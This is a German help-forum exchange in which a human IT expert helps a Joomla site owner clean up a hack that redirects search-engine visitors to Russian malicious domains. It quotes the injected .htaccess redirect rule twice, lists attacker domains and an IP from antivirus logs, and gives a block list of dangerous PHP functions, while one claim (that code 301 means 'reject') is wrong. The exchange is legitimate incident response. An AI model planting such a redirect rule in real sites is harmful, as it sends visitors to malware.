So funktioniert JustAnswer:

  • Fragen Sie einen Experten
    Tausende Experten in über 200 Kategorien.
  • Erhalten Sie eine professionelle Antwort
    Per E-Mail oder sofortiger Benachrichtigung, während Sie auf unserer Website warten.
    Stellen Sie ggf. weitere Anschlussfragen.
  • 100%ige Zufriedenheit garantiert
    Bewerten Sie die erhaltene Antwort.

Stellen Sie Ihre Frage an IT-Fachinformat...

IT-Fachinformatiker
IT-Fachinformatiker, Systemadministrator
Kategorie: Computer
Zufriedene Kunden: 6838
Erfahrung:  Software Entwicklung, Projekt Erfahrung, Windows-Netzwerke, Linux-Netzwerke, Windows/Linux-Server
32504664
Geben Sie Ihre Frage in der Kategorie Computer hier ein
IT-Fachinformatiker ist jetzt online.

Ich kann nicht mehr auf meine Website zugreifen. Diese wird

Kundenfrage

Ich kann nicht mehr auf meine Website zugreifen. Diese wird auf einen Website von Lady Gagga umgeleitet. Auf meinem Computer geht es, das Norton Antivirus mit der Fehlermeldung reagiert. Agreifer-URL antivirusesrateings.ru/thenautorelies.cgi?8
Quelladresse: 37.59.164.210
Angriff wurde von Device\Harddiskvolume3\Program Files (86)\Mozilla Firefox\Firefox.exe verursacht.
Was kann ich tun.

MfG. Michael Begelspacher [email protected]
Gepostet: vor 4 Jahren.
Kategorie: Computer
Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo,

als erstes müssen Sie auf allen Windows Rechern diesen Scanner laufen lassen:

http://www.chip.de/downloads/Malwarebytes-Anti-Malware_27322637.html

Die Testphase kann abgelehnt werden danach den Anweisungen folgen Quickscan reicht erst einmal. Evtl. muss der PC einmal neu gestartet werden.

Sehr wahrscheinlich wurde Ihr FTP-Kennwort gehackt das müssen Sie umgehend ändern. Die Weiterleitung kann aber auch über die hosts Datei von Windows ausgelöst worden sein:

Startmenü > suchen Sie nach cmd > Rechtsklick > "als Administrator ausführen"

geben Sie ein:

notepad C:\Windows\System32\drivers\etc\hosts

und prüfen Sie, ob dort eine evtl. Weiterleitung steht. Dann gehen Sie auf: Es ist auch möglich, das Sie Opfer von "DNS-Changer" wurden dieser tauscht den DNS-Server im TCP/IP-Settup unter Windows aus, so das Sie auf andere Sites geleitet werden.

Ich muss allerdings gleich zu einem Notfall ich hoffe, das dies für Sie in Ordnung ist prüfen SIe auch folgendes: WLAN-Sicherheit > WPA2 > Netzwerkschlüssel ggf. ändern.

Entweder wurde das FTP-Kennwort "gestohlen" oder Sie sind Opfer eines Trojaners geworden oder aber, jemand bekam unbemerkt Zugriff auf Ihren Rechner via WLAN.

Achtung: Ein lokal installierte Virenscanner ist nutzlos, wenn ein Trojaner diesen unterwandert.

Gruss Günter




Kunde: hat geantwortet vor 4 Jahren.

Was kann ich tun wenn dies nicht funktioniert. Melden Sie sich dann später nochmal?

Kunde: hat geantwortet vor 4 Jahren.

Virenscan hat nichts gebracht. Alles OK. WLAN habe ich nie an.


Und das ist das Protokoll von Notepad.


 


# XXXXX (c) 1993-2009 Microsoft Corp.
#
# XXXXX is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# XXXXX file contains the mappings of IP addresses to host names. Each
# XXXXX should be kept on an individual line. The IP address should
# XXXXX placed in the first column followed by the corresponding host name.
# XXXXX IP address and the host name should be separated by at least one
# XXXXX
#
# XXXXX comments (such as these) may be inserted on individual
# XXXXX or following the machine name denoted by a '#' symbol.
#
# XXXXX example:
#
# 102.54.94.97 rhino.acme.com # XXXXX server
# 38.25.63.10 x.acme.com # XXXXX client host

# XXXXX name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost


 


Was kann ich also noch tun?

Kunde: hat geantwortet vor 4 Jahren.

Ich muss jetzt auch nochmal weg und hoffe Sie melden sich nochmal!? Anbie nochmal die Meldung von Norton.


 


Kategorie:Intrusion Prevention


Datum/Uhrzeit,Risiko,Aktivität,Status,Empfohlene Aktion,Name der IPS-Warnung,Standardaktionen,Durchgeführte Aktion,Angreifender Computer,Angreifer-URL,Zieladresse,Quelladresse,Beschreibung des Datenverkehrs


05.11.2012 14:57:13,Hoch,Ein Eindringversuch von outnumberwhiskey.ru wurde blockiert.,Blockiert,Keine Aktion erforderlich,Web Attack: Malicious Cookie Website,Keine Aktion erforderlich,Keine Aktion erforderlich,"outnumberwhiskey.ru (37.59.164.210, 80)",outnumberwhiskey.ru/ensuringafoul.cgi?8,"MICHAEL-LAPTOP (192.168.2.104, 56815)",37.59.164.210 (37.59.164.210),"TCP, www-http"


Netzwerkverkehr von <b>outnumberwhiskey.ru/ensuringafoul.cgi?8</b> entspricht der Signatur eines bekannten Angriffs. Der Angriff wurde von \DEVICE\HARDDISKVOLUME3\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE verursacht. Wenn Sie keine weiteren Benachrichtigungen über diese Art von Netzwerkverkehr erhalten möchten, klicken Sie unter <b>"Aktionen"</b> auf <b>"Nicht mehr benachrichtigen"</b>.


 


Ich nehme an, dass die Umleitung über Strato von meinem Server kommt.

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo,

ich analysiere derzeit die Dinge ich bitte Sie jedoch um etwas Geduld, da es etwas dauern kann ich melde mich aber auf jeden Fall in der nächsten 1 h. Bitte lassen Sie mal die Kaspersky Notfall CD über alle Windows PCs laufen.

Die ISO einmal mit IMGburn auif CD brennen > CD einlegen > neu starten > scannen lauifen lassen. Ansonsten prüfen Sie alle Dateien, die in Ihrer Website enthalten sind und teilen Sie mir bitte mit, was passiert wenn Sie die Seite auf einem anderen PC oder Mac aufrufen. Entweder ist der Code der Site gehackt oder aber ein Trojaner ist auf einem Ihrer Rechner.

Gruss Günter
Kunde: hat geantwortet vor 4 Jahren.

Alles klar. Ich bin jetzt auch mal kurz weg.


Auf meinem iPad werde ich auf die Seite von Lady Gaga umgeleitet. Auf meinem Notebook (der einzige Rechner) fängt es Norton ab.


Wenn Sie die Website aufrufen, sehen Sie unten die Umleitung kurz eingeplendet.


Ich habe auf dem Server von Strato zwei Websites.


www.michael-begelspacher.de


www.ifnuh.de


 


Bei beiden wird es umgeleitet. Es muss also auf dem Server sein. Ich hätte es auch nicht bemerkt, wenn mich nicht ein Kunde aufemerksam gemacht hätte.


 


Ich habe die Zugangsdaten zum FTP Server geändert. Ich kann Ihnen die Daten zum Zugreifen geren mailen. Ich nehme an Sie sehen sofort was los ist.


 


Gruß


Michael


 

Kunde: hat geantwortet vor 4 Jahren.

Ich bin wieder zurück und warte. Die Frage ist, was passiert wenn jemand meine Website anklickt? Welche Dateien werden aufgerufen.


In den .htaccess Dateien steht folgendes am Anfang:


Ist das OK.?


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(duckduckgo|ask|google|dogpile|archive|clusty|mahalo|mywebsearch|blekko|lycos|webcrawler|info|infospace|search|excite|goodsear ch|altavista|live|msn|aol|yahoo|youtube|wikipedia|infoseek|bing|facebook|twitter|myspace|linkedin|flickr|deviantart|livejournal|tagged|badoo|mylife|ning|pinterest)\.(.*)
RewriteRule ^(.*)$ http://nullifiedfilebyfile.ru/magicactionable.cgi?8 [R=301,L]
</IfModule>


 


 

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo,

das da:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(duckduckgo|ask|google|dogpile|archive|clusty|mahalo|mywebsearch|blekko|lycos|webcrawler|info|infospace|search|excite|goodsear ch|altavista|live|msn|aol|yahoo|youtube|wikipedia|infoseek|bing|facebook|twitter|myspace|linkedin|flickr|deviantart|livejournal|tagged|badoo|mylife|ning|pinterest)\.(.*)
RewriteRule ^(.*)$ http://nullifiedfilebyfile.ru/magicactionable.cgi?8 [R=301,L]
</IfModule>

bitte raus werfen das sieht doch ein wenig merkwürdig aus. Code 301 = Reject. Wenn das vorher nicht drin war und das denke ich werfen Sie es raus.

Wenn das auch vom IPad so ist, dann ist folgendes passiert.

.htaccess, index.php, index.html etc wurde umgeschrieben dummerweise so geschickt, das Sie nur durch ersetzen der betroffen Dateien das Problem lösen können. Sie müssen eine Sicherung also haben das ist wichtig. Außerdem: Sie müssen alle Kennwörter ändern und zwar Ihren Webzugang zum Anbieter (Controlpanel) und den FTP-Zugang.

Gruss Günter
Kunde: hat geantwortet vor 4 Jahren.

Hallo Günter,


 


ich bin gerade dabei die komplette Sicherung von Juni 2012 auf den Server zu spielen. Ich habe erstmal eine Testdadei angelegt und werde per Umleitung darau zugreifen.


Leider habe ich das nur für eine Website. Ich werde also wenn es funktioniert, sämtliche Dateien durchsuchen müssen um alles rauszulöschen.


Ich melde mich, sobald ich mehr weiß.


 


Vielen Dank


 


Michael

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo,

in Ordnung ich bitte Sie jedoch heute noch eine Rückmeldung zu geben. Sie wissen nun was es ist ändern Sie alle wichtigen Kennwörter und vorallem: Beseitigen Sie ggf. existierende Sicherheitslücken Ihrer Seite das gilt ganz besonders wenn man ein CMS wie Joomla usw. einsetzt. Viele CMS Systeme bieten auf den jeweiligen Sites Updates an.

Wenn Sie die Site selbst entworfen haben, müssen Sie auch dafür sorgen das folgendes geregelt wird:

- Formulareingaben müssen genau gefiltert werden
- Manipulation von URLs darf nicht möglich sein
- Sessions müssen penibel und sicher verwaltet werden

Für Apache gibt es das Modul "mod_security" welches 90% aller Standardangriffe bereits abwehrt. In Ihrem Fall kann nur folgendes passiert sein, da es ja auf allen Geräten so ist:

1. FTP-Kennwort wurde gestohlen
2. Seite wurde gehackt z.B. durch manipulierte und unkontrollierte URLs

Bitte teilen Sie mir später das Resultat mit, ich bin bis 22 h online und lesen Sie bitte auch meine Antwort und prüfen Sie, ob Sie vom DNS-Charger betroffen sind dazu bitte in den TCP/IP-Einstellungen prüfen ob dort ein DNS-Server manuell eingetragen wurde.

Gruss Günter
Kunde: hat geantwortet vor 4 Jahren.

Ich bleibe jetzt ununterbrochen dran, denn es muss wieder laufen.


Ich benutze Joomla 2.5.



Das mit dem DNS-Charger habe ich allerdings nicht verstanden. Was muss ich da genau machen?

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo,

das ist ein Trojaner und dieser ändert den DNS-Server allen vorran unter Windows da es aber auf dem IPad wohl ebenso ist, schließe ich diesen eher aus. Dieser Schädling war vor einiger Zeit noch sehr aktiv inzwischen gibt es die Prüfseite www.dns-ok.de jedoch nicht mehr. Insgesamt hat es sich damit eher erledigt. Dieser Artikel erklärt dessen Vorgehensweise.

Gruss Günter
Kunde: hat geantwortet vor 4 Jahren.

Habe eben erst den Artikel gesehen. Daran kann es aber nicht liegen. Wie schon erwähnt hat mich ein Kunde darauf aufmerksam gemacht. Meine Frau hat es von zu Hause auf Ihrem Rechner ebenfalls.


 


Ich habe es denoch ausprobiert und es zeigt bei DNS Server: fe80::1%10


192.160.2.1


 


Ist das OK.?


 


Ansonsten läuft es also eindeutig über den Strato Server und muss auf meinem Webspace sein. Die Website meiner Frau, ebenfalls auf Strato funktioniert einwandfrei. Dies ist eine andere Domain.


Was passiert denn wenn jemand meine Webadresse anwählt?


Welche Datei wird zu erst aufgerufen?


Ich habe im Hauptverzeichnis die Website www.ifunu.de und im Unterverzeichnis die andere www.michael-begelspacher.de


 


Bei beiden ist es das gleiche. Die Sicherungsdadei habe ich auf das Unterverzeichnis Neu gespielt. Und auch da geht es nicht. Die Umleitung die ich dafür durchgeführt habe lautet: www.infnuh.de/Neu

Kunde: hat geantwortet vor 4 Jahren.

Die Quelladresse von der die Störung herkommt ist laut Norton immer die gleiche. 37.59.164.210


Die Angreifer URL ändert sich immer wieder und ist genau das was ich aus der .htaccess Datei immer wieder lösche.


Jeztz lautet die angreifer URL: areahurnannah.ru (37.59.164.210, 80)

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo

es ist auch nicht DNS-Charger das war nur eine Vermutung. Es ist Ihre Webseite diese verursacht diese Weiterleitung das ist alles. Es wird immer folgendes Dokument vom Server als erstes ausgeliefert (Reihenfolge kann je nach Server abweichen):

index.php
index.html
index.htm
home.html
default.htm

Bei Joomla natürlich index.php es muss also Ihre Seite sein, die angegriffen wurde bei Joomla ist das leider nicht selten daher müssen Sie entsprechende Siecherheitsupdates einspielen. Häufiger Angriffspunkt sind die Templates diese sind enorm riskant und sollten bis auf das verwendete ganz gelöscth werden.

Gruss Günter
Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo

noch etwas: Sie müssen die gesamte Seite löschen > ALLES wirklich alles. Danach müssen Sie das FTP-Kennwort ändern und audh das Kennwort zu Strato. Erst DANN können Sie eine Sicherung zurückspielen. Solange Sie anders vorgehen, wird der Angreifer weiter leichtes Spiel haben.

Joomla und auch andere CMS-Systeme sind voll von Sicherheitslücken die man direkt nach der Insrtallation stopfen muss das liegt einfach an der enorm hohen Verbreitung der CMS Systeme, weshalb ich keine solchen Sysrteme verwende oder msassiv absichere.

Sie müssen also den CONTENT löschen > KENNWÖRTER ändern > Seite neu hochladen / bzw. eine index.html manuell mit einem einfachen Test zum tesrten anlegen. Die Datenbank muss genauso neu aufegebaut werden. Grund: Wir wissen nicht, was der Angreifer unterwandert hat möglicherweise mehr als nur ein index-Dokument.

LG Günter
Kunde: hat geantwortet vor 4 Jahren.

OK. Vielen Dank, XXXXX XXXXX ich dann ab Morgen versuchen.


 


Ich schau mal, ob es bei Strato ein Backup gibt mit dem ich es mal versuchen kann. Ansonsten muss ich wohl alles neu machen.


Wäre eine Katastrophe.


 


Was wäre denn die sicherste Lösung? Alles wieder selbst zu programmieren? Und wie kann ich dann verhindern, dass so etwas nich nicht nochmal passiert?


 


Ich danke XXXXX XXXXX und mache jetzt Feierabend. Denn das dauert ja dann wohl eine ganze Weile, bis ich es neu aufgesetzt habe.


 


Einen schönen Abend


 


MfG. Michael Begelspacher

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo

also Fakt ist folgendes: Jemand hat Ihre Siete gehackt daher trat das Problem auch auf allen möglichen Comoutern etc. auf. Gehen Sie exakt so vor, wie ich es Ihnen empfohlen habe. Damit Sie das in Zukunft verhindern müssen Sie folgendes beachten;

1. Alle für Joomla verfügbaren Updates installieren

2. Sichern Sie den Admin Bereich zusätzlich durch ein 2. Kennwort Stichwort .htacess das sollte auch bei Ihrem Anbieter mlöglich sein

3. Man kann bei vielen Anbietern PHP Befehle sperren oft ist es eine php.ini ofolgende PHP Befehle sind gefährlich und werden oft für Angriffe ausgenutzt:

escapeshellcmd, show_source, system, shell_exec, passthru, exec, popen, proc_open, symlink, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, apache_note, apache_setenv, closelog, debugger_off, debugger_on, define_syslog_variables, openlog, syslog, popen, pclose, ini_restore, socket_connect, socket_accept, socket_bind, socket_create, posix_getpwuid, posix_kill, posix_mkfif, phpinfo, openlog, link, apache_child_terminate, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, define_syslog_variables, posix_uname, proc_close, proc_get_status, tmpfile, virtual, syslog, pfsockopen, php_uname, ini_alter, ini_get_all, ini_restore, diskfreespace, dl, error_log

vorallem exec, proc_open, symlink und eval sind enorm gefährlich das auf jeden Fall abschalten. Ausserdem sollte Ihr Webserver d.h. wenn Sie auf die Apache Configuration Zugriff haben folgendes abgeschaltret sein:

php_admin_value allow_url_fopen Off
php_admin_value allow_url_include off

das verhindert das einschleusen von Code der nicht auf diesem Server gehört sprich von extern.

4. Als erstes aber Kennwöreter ändern ganz wichtig

Ganz verhindern kann man es nicht aber das Risiko deutlich reduzieren. Sie sollten auch bei Joomla im Ordner templates/ nur das Template lassen, welches Sie verewnden das Template milkyway z.B. wird sehr oft für Angriffe ausgenutzt. Wenn Sie die o.a. Ratschläge befolgen, dann sind Sie auf der sichereren Seite.

Sie müssen auch regelmäßige Sicherungen durchführen und fragen Sie Ihren anbieter nach dem Apache Modul "mod_security" damit werden schon viele Angriffe direkt abgewehrt. Ich hoffe das ich Ihnen helfen konnte und würde mich sehr über eine positive Bewertung freuen, wofür ich mich herzlich bedanke natürlich bin ich weiter für sioe da!

LG Günter
Kunde: hat geantwortet vor 4 Jahren.

Ok. Vielen Dank erstmal.


 


 

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.

Hallo,

gern geschehen ich würde mich im Falle eines Erfolgs über eine positive Bweertung freuen, bitte nutzen Sie dazu den :-) unter meiner Antwort. Ich danke XXXXX XXXXXür ganz herzlich und bin sehr gern weiter für Sie da!

L;G Günter

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.

Hallo,

sofern ich Ihnen helfen bzw. weiter helfen konnte oder Sie aufgrund meiner Vorschläge in die richtige Richtung gekommen sind, so wäre ich über eine positive Bewertung sehr dankbar. Um eine positive Bewertung abgeben zu können, müssen Sie auf den :-) unter meiner Antwort klicken nur so erfolgt auch die Bezahlung an mich.Wenn Sie eine positive Bewertung abgeben, muss ich davon ausgehen das Sie zufrieden sind. Ich stehe Ihnen natürlich gern weiter zur Verfügung. Vielen Dank!

Gruss

Günter

 

Wichtig: Bitte geben Sie nur EINE positive Bewertung ab, nicht zwei mal darauf klicken falls Sie diesen Text ein 2. mal lesen. Vielen Dank

 

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.

Hallo,

sofern ich Ihnen helfen bzw. weiter helfen konnte oder Sie aufgrund meiner Vorschläge in die richtige Richtung gekommen sind, so wäre ich über eine positive Bewertung sehr dankbar. Um eine positive Bewertung abgeben zu können, müssen Sie auf den :-) unter meiner Antwort klicken nur so erfolgt auch die Bezahlung an mich.Wenn Sie eine positive Bewertung abgeben, muss ich davon ausgehen das Sie zufrieden sind. Ich stehe Ihnen natürlich gern weiter zur Verfügung. Vielen Dank!

Gruss

Günter

 

Wichtig: Bitte geben Sie nur EINE positive Bewertung ab, nicht zwei mal darauf klicken falls Sie diesen Text ein 2. mal lesen. Vielen Dank

 

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo,

konnten Sie inzwischen etwas erreichen? Wir haben den Vorgang ja noch nicht abgeschlossen. Funktioniert Ihre Seite wieder?

Gruss Günter
IT-Fachinformatiker, Systemadministrator
Kategorie: Computer
Zufriedene Kunden: 6838
Erfahrung: Software Entwicklung, Projekt Erfahrung, Windows-Netzwerke, Linux-Netzwerke, Windows/Linux-Server
IT-Fachinformatiker und weitere Experten für Computer sind bereit, Ihnen zu helfen.
Kunde: hat geantwortet vor 4 Jahren.

Hallo Günter,


 


nachdem ich jetzt zwei Tage lang alles vom Server geladen habe. Habe ich ein Backup vom 28.10.12 zurückgespielt.


 


Die neue Seite mit Joomla 2.5 funktioniert jetzt wieder. Bei der anderen Seite mit Joomla 1.5 funktionieren die Links nicht mehr.


 


Wie ich nachlesen konnte ist die 1.5 Version ein Sicherheitsrisiko.


Ich werde die Seite in die neue integrieren und die alte dann löschen.


 


Vielen Dank für Ihre Hilfe


 


Eine Bewertung habe ich eben vorgenommen.


 


Schöne Grüße aus Freiburg


 


Michael

Kunde: hat geantwortet vor 4 Jahren.

Sorry, ich habe jetzt erst geschnallt, dass Ihre Bezahlung wahrscheinlich von meiner Bewertung bzw. Abschluss abhängt.


 


Hätte ich längst getan, wenn ich es gewusst hätte.


 


 

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo Miichalel,

ja das ist korrekt Joomla 1.5 = Sicherheitsriko. Für Ihre positive Bewertujng bedanke ich mich ganz herzlich bei Ihnen und wie Sie festgestellt haben, lag ich richtig jemand hat sich an Ihrer Seite zu schaffen gemacht. Bitte beachten Sie aber auch meine Sicherheitstipps alles was nicht nötig ist wie unnnötige Templates etc solllte gelöscht werden und eine .htaccess sollte den Ordner admininistrator/ zusätzlich schützen. Spielen Sie auch entsprechende Bugfixes etc. für Ihre Version ein und denken Sie an das ändern der Kennwörter falls noch nicht geschehen. Ich stehe Ihnen natürlich sehr gern weiter zu Ihrer vollsten Verfügung!

LG Günter
Kunde: hat geantwortet vor 4 Jahren.

Vielen Dank.


 


Noch eine letzte Frage. Wie schütze ich den Ordner Administratotor durch die .htaccess Datei.


 


 


Muss ich einen besonderen Eintrag unterbringen?


 


 

Experte:  IT-Fachinformatiker hat geantwortet vor 4 Jahren.
Hallo

dazu müssen Sie sich im Contropanel Ihres Providers einloggen da muss es eine Option geben "Verzeichnis schützen" oder "Passort geschützte Bereiche" damit ließen sich dann Ordner schützen Sie müssen nur den Ordner und das Kennwort angeben den Rest macht der Anbieter für Sie. In diesem Artikel wird dies bzgl. Strato noch einmal gut erklärt.

LG Günter

Bekannt aus:

 
 
 
„[...]mehr als Zehntausend Experten weltweit; 1500 davon in Deutschland. Acht Jahre nach dem Start ist das [...] Online-Unternehmen mit seinen 90 Mitarbeitern die größte Web-Seite für das Vermitteln von Experten von Anwälten über Ärzte bis hin zu Universitätsprofessoren.“
„Wer eine fachmänische Lösung für ein medizinisches, rechtliches oder technisches Problem sucht, kann das jetzt auch im Internet tun. Lebenshilfe auf die schnelle, unkomplizierte und vor allem erschwingliche Art bietet die Seite www.justanswer.de. Etwa 1500 Experten stehen per Mail für Fragen zu ca. 200 Fachgebieten rund um die Uhr zur Verfügung."
„Rat gewünscht? Rechtliche, medizinische oder allgemeine Fragen beantworten Experten unter www.justanswer.de."
„JustAnswer, die weltweit führende Online-Plattform für Expertenfragen und -antworten, bietet ab sofort noch mehr Sicherheit und Qualität für Verbraucher."
„Ob Vorbereitung, Notfall oder Reklamation nach dem Urlaub - JustAnswer bietet jederzeit schnelle, kompetente Antworten"
„Die Online-Plattform JustAnswer bringt Ratsuchende und Experten in über 200 Fachgebieten zusammen."
 
 
 

Was unsere Besucher über uns sagen:

 
 
 
  • Ich bedauere, dass ich nicht gleich bei Ihnen gelandet bin. Die Leerung des Cache hat das Problem gelöst. Danke Gerd Schönbuchner Grafrath
< Zurück | Weiter >
  • Ich bedauere, dass ich nicht gleich bei Ihnen gelandet bin. Die Leerung des Cache hat das Problem gelöst. Danke Gerd Schönbuchner Grafrath
  • Endlich ein Experte, der mir wirklich weiterhelfen konnte! DANKE! JustAnswer Kunde Taunusstein
  • Ihre Antwort hat mir sehr geholfen, die richtigen Entscheidungen zu treffen. Dass Sie mir darüber hinaus noch 2 Empfehlungen gegeben haben fand ich super. Vielen Dank! JustAnswer Kunde Freiburg
  • Die ausgearbeiteten Hilfen waren gut strukturiert, leicht verständlich und zu 100% hilfreich für mich. Vielen Dank Markus B. Karlsruhe
  • Sehr schnelle und kompetente Antwort, die für mich bares Geld bedeutet. Vielen Dank! S.Stober K.
  • Herzlichen Dank! Hab durch Ihre Antwort viel Geld gespart! Ben R. Deutschland
  • Sehr schnelle und kompetente Hilfestellung. Besonders für mich als Laien wurde alles sehr verständlich erklärt. Gerne wieder! Rosengl Bad Tölz
 
 
 

Lernen Sie unsere Experten kennen:

 
 
 
  • Tronic

    Tronic

    IT-Specialist

    Zufriedene Kunden:

    2269
    Elektroniker und EDV-Service
< Zurück | Weiter >
  • http://ww2.justanswer.com/uploads/PY/Pyroflash/2011-4-21_104934_tronic.64x64.jpg Avatar von Tronic

    Tronic

    IT-Specialist

    Zufriedene Kunden:

    2269
    Elektroniker und EDV-Service
  • http://ww2.justanswer.com/uploads/rufushoschi/2010-11-08_135947_bild.jpg Avatar von IT-Fachinformatiker

    IT-Fachinformatiker

    Systemadministrator

    Zufriedene Kunden:

    6338
    Software Entwicklung, Projekt Erfahrung, Windows-Netzwerke, Linux-Netzwerke, Windows/Linux-Server
  • http://ww2.justanswer.com/uploads/COMINAROSA/2010-02-03_172238_PASSBILD.JPG Avatar von COMIN IT-Service

    COMIN IT-Service

    Dipl.-Ing.

    Zufriedene Kunden:

    779
    Dipl.Ing (FH) ET, NT, IT
  • http://ww2.justanswer.com/uploads/RaubergerConcep/2010-03-02_102740_Portraet64.jpg Avatar von RaubergerConcept

    RaubergerConcept

    IT-Specialist

    Zufriedene Kunden:

    234
    Mehr als 10 Jahre Erfahrung in Softwareentwicklung und Netzwerktechnik
  • http://ww2.justanswer.com/uploads/LF/lfalkenburg/2015-2-8_01843_.64x64.jpg Avatar von Lutz Falkenburg

    Lutz Falkenburg

    IT-Specialist

    Zufriedene Kunden:

    96
    Seit über 20 Jahren beruflich im IT-/IUK-Bereich tätig. Egal ob EinzelPC der Netzwerk...
  • http://ww2.justanswer.com/uploads/BI/BigDaddyXD/2012-10-24_20126_WhySoSeriousJob.64x64.jpg Avatar von BigDaddyXD

    BigDaddyXD

    Informatiker

    Zufriedene Kunden:

    1588
    Microsoft Certified Professional, Microsoft Certified Desktop Support Technican,...
  • http://ww2.justanswer.com/uploads/PU/Pucky80/2011-5-14_54537_pucky80.64x64.jpg Avatar von Pucky80

    Pucky80

    IT-Systemkaufmann

    Zufriedene Kunden:

    1322
    MCITP (Microsoft Server 2008 Enterprise Administrator)
 
 
 

Ähnliche Fragen in der Kategorie Computer